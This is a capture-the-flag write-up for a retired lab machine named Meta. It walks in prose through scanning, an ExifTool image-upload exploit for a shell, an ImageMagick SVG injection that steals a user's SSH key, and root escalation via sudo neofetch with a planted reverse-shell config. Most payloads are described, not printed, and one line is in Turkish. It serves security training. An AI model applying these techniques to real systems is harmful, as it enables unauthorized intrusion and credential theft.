Meta machine is a vulnerable machine with Linux operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Full Port Scan
As a result of port scanning, 22/tcp ssh OpenSSH 7.9p1, 80/tcp http Apache ports are open.
Since there is no vulnerability on the ssh port, we provide enumeration on port 80.
We have looked through source code, wep analyzer, what web, developer mode, we did not get any information. We did not get any information on the web.
We are scanning files and directories with Gobuster.
We are running a subdomain scan with Wfuzz with no results in the file and directory scan.
We found the subdomain dev01, save it in /etc/hosts and access it via browser.
We provide enumeration via dev01.artcorp.htb.
Click on Metaview.
Here we see the metadata information of the files with MetaView
We received an error when we tried to upload the file like txt,php. The error received was “File not allowed (only jpg/png).”
Here it shows the metadata information of the image files. Let’s change this metadata information and see how it will react as php code.
We didn’t see the comment part here.
Then it takes this and uses it within itself.
We saw it in the comments section.
Let’s see if there is a vulnerability with Exiftool.
Download the code from Github and run it on our machine
Upload the updated file to the opposite machine and run it
As you can see, the ls command worked, we are writing the code that will give us the Shell.
We created the file and uploaded it to the target machine, but we couldn’t get Shell because there was no interaction, so we need to run a command to trigger Shell.
First let’s see where wget is
Then we wrote the command to communicate, but we didn’t get it. Let’s look at the exploits for this on Github.
We run this script. We upload our target png file to the other side.
We got Shell.
We provide local enumeration because we have limited authorizations.
Here we read the contents of the /usr/local/bin/convert_images.sh bash file. We understand that it uses mogrify (mogrify: a Linux tool for resizing, blurring, cropping an image).
Let’s see if there’s a vulnerability in this version.
We create the poc.svg file found at https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html on our machine.
As you can see, it created a file named muhammed under the /dev/shm folder. Then let’s tell this poc.svg file to take the ssh key of user Thomas and write it under the dev/shm folder.
To get this file
We changed the part and uploaded it again to the target machine.
We got our ssh key, let’s immediately get our id_rsa file and provide ssh connection
(additional information Here we take the -‘s at the beginning and end of the ssh key and place them in the subset and this is how we were able to connect. Here we got an error while connecting)
This way we got Shell and got our user flag
Since we do not have root authorization, we provide local enumeration.
Let’s gtfo see how we can root on Neofetch.
When we try to use sudo authorization here, it asks us for a password and we don’t know the password.
Therefore, when we run sudo -l, env_keep+=XDG_CONFIG_HOME
Let’s try to manipulate the config.conf file, that is, create a file and call it config file.
Aynı formatta bir conf dosyası yolu olurştduk içreisinde bash reverhsell yazdık.
XDG_CONFIG_HOME=/tmp/.myconfig sudo neofetch and we were able to get Shell with root privileges.